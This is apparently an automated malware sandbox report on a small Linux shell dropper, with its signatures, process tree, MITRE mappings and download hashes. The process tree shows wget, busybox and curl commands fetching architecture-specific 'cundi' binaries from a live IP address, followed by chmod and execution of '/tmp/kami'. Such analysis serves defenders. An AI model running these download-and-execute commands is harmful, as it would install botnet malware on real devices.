45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854

Analysis

max time kernel
37s
max time network
44s
platform
debian-9_armhf
resource
debian9-armhf-20240226-en
resource tags

arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
06/03/2024, 06:28

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854
Size

3KB
MD5

85889171bef98258134a12c9d2b9e471
SHA1

54f16c48dd43fdc61ab7e1eea4aef7da4a71888c
SHA256

45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854
SHA512

5df64c99fe98994517ebad1bbeefc0ee3998899bb8c71efe34db488dd2fc498c967a9c5dafc142935097ff7780f67b56b8bb6fa483fdb28829c87039de2f04b2

Score

7^/10

antivm

Malware Config

Signatures

Executes dropped EXE 12 IoCs

ioc	pid	Process
/tmp/kami	716	kami
/tmp/kami	774	kami
/tmp/kami	781	kami
/tmp/kami	788	kami
/tmp/kami	797	kami
/tmp/kami	804	kami
/tmp/kami	812	kami
/tmp/kami	820	kami
/tmp/kami	830	kami
/tmp/kami	838	kami
/tmp/kami	845	kami
/tmp/kami	854	kami

Checks CPU configuration 1 TTPs 12 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 24 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/cundi.arm7	curl
File opened for modification	/tmp/cundi.mips	curl
File opened for modification	/tmp/cundi.arm	curl
File opened for modification	/tmp/cundi.i468	curl
File opened for modification	/tmp/cundi.i686	curl
File opened for modification	/tmp/cundi.mpsl	curl
File opened for modification	/tmp/cundi.arm5	curl
File opened for modification	/tmp/cundi.ppc	curl
File opened for modification	/tmp/kami	Process not Found
File opened for modification	/tmp/cundi.arc	curl
File opened for modification	/tmp/cundi.x86_64	curl
File opened for modification	/tmp/cundi.x86	curl
File opened for modification	/tmp/cundi.arm6	curl

/tmp/45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854
/tmp/45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854
1⤵
PID:656
- /usr/bin/wget
  wget http://103.47.195.200//cundi.x86
  2⤵
  PID:658
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.x86
  2⤵
  PID:684
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:702
- /bin/cat
  cat cundi.x86 play
  2⤵
  PID:714
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.x86 kami systemd-private-4300ff3db7ee4e659c6ecb32faa716d1-systemd-timedated.service-UnRStU
  2⤵
  PID:715
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:716
- /usr/bin/wget
  wget http://103.47.195.200//cundi.mips
  2⤵
  PID:719
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.mips
  2⤵
  PID:733
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:741
- /bin/cat
  cat cundi.mips play
  2⤵
  PID:772
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.mips cundi.x86 kami systemd-private-4300ff3db7ee4e659c6ecb32faa716d1-systemd-timedated.service-UnRStU
  2⤵
  PID:773
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:774
- /usr/bin/wget
  wget http://103.47.195.200//cundi.arc
  2⤵
  PID:776
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.arc
  2⤵
  PID:777
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:778
- /bin/cat
  cat cundi.arc play
  2⤵
  PID:779
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.arc cundi.mips cundi.x86 kami systemd-private-4300ff3db7ee4e659c6ecb32faa716d1-systemd-timedated.service-UnRStU
  2⤵
  PID:780
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:781
- /usr/bin/wget
  wget http://103.47.195.200//cundi.i468
  2⤵
  PID:783
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.i468
  2⤵
  PID:784
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.i468
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:785
- /bin/cat
  cat cundi.i468 play
  2⤵
  PID:786
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.arc cundi.i468 cundi.mips cundi.x86 kami systemd-private-4300ff3db7ee4e659c6ecb32faa716d1-systemd-timedated.service-UnRStU
  2⤵
  PID:787
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:788
- /usr/bin/wget
  wget http://103.47.195.200//cundi.i686
  2⤵
  PID:790
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.i686
  2⤵
  PID:793
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:794
- /bin/cat
  cat cundi.i686 play
  2⤵
  PID:795
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.arc cundi.i468 cundi.i686 cundi.mips cundi.x86 kami systemd-private-4300ff3db7ee4e659c6ecb32faa716d1-systemd-timedated.service-UnRStU
  2⤵
  PID:796
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:797
- /usr/bin/wget
  wget http://103.47.195.200//cundi.x86_64
  2⤵
  PID:799
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.x86_64
  2⤵
  PID:800
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:801
- /bin/cat
  cat cundi.x86_64 play
  2⤵
  PID:802
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.arc cundi.i468 cundi.i686 cundi.mips cundi.x86 cundi.x86_64 kami systemd-private-4300ff3db7ee4e659c6ecb32faa716d1-systemd-timedated.service-UnRStU
  2⤵
  PID:803
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:804
- /usr/bin/wget
  wget http://103.47.195.200//cundi.mpsl
  2⤵
  PID:806
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.mpsl
  2⤵
  PID:807
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:808
- /bin/cat
  cat cundi.mpsl play
  2⤵
  PID:810
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.arc cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.x86 cundi.x86_64 kami systemd-private-4300ff3db7ee4e659c6ecb32faa716d1-systemd-timedated.service-UnRStU
  2⤵
  PID:811
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:812
- /usr/bin/wget
  wget http://103.47.195.200//cundi.arm
  2⤵
  PID:814
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.arm
  2⤵
  PID:816
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:817
- /bin/cat
  cat cundi.arm play
  2⤵
  PID:818
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.arc cundi.arm cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.x86 cundi.x86_64 kami systemd-private-4300ff3db7ee4e659c6ecb32faa716d1-systemd-timedated.service-UnRStU
  2⤵
  PID:819
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:820
- /usr/bin/wget
  wget http://103.47.195.200//cundi.arm5
  2⤵
  PID:822
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.arm5
  2⤵
  PID:823
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:827
- /bin/cat
  cat cundi.arm5 play
  2⤵
  PID:828
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.arc cundi.arm cundi.arm5 cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.x86 cundi.x86_64 kami
  2⤵
  PID:829
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:830
- /usr/bin/wget
  wget http://103.47.195.200//cundi.arm6
  2⤵
  PID:832
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.arm6
  2⤵
  PID:834
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:835
- /bin/cat
  cat cundi.arm6 play
  2⤵
  PID:836
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.arc cundi.arm cundi.arm5 cundi.arm6 cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.x86 cundi.x86_64 kami
  2⤵
  PID:837
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:838
- /usr/bin/wget
  wget http://103.47.195.200//cundi.arm7
  2⤵
  PID:840
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.arm7
  2⤵
  PID:841
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:842
- /bin/cat
  cat cundi.arm7 play
  2⤵
  PID:843
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.arc cundi.arm cundi.arm5 cundi.arm6 cundi.arm7 cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.x86 cundi.x86_64 kami
  2⤵
  PID:844
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:845
- /usr/bin/wget
  wget http://103.47.195.200//cundi.ppc
  2⤵
  PID:847
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.ppc
  2⤵
  PID:848
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:850
- /bin/cat
  cat cundi.ppc play
  2⤵
  PID:852
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 cundi.arc cundi.arm cundi.arm5 cundi.arm6 cundi.arm7 cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.ppc cundi.x86 cundi.x86_64 kami
  2⤵
  PID:853
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:854
- /usr/bin/wget
  wget http://103.47.195.200//cundi.spc
  2⤵
  PID:856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/cundi.x86

Filesize
10B

MD5
7605968e79d0ca095ab1231486d2b814

SHA1
a007b420d19ceefa840f0373e050e3b51a4ab480

SHA256
493fda53120050f85836032324409be6c6484f90a0755ae0c6a673ba7626818b

SHA512
769249da7ed6c6bf5671bbc2371a6453b433226ceb8c4c2aa3604000d66647bcec83dee1ab64c0262fa40f923d77e23bad2c47274d339effc51d904ce77072a6

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads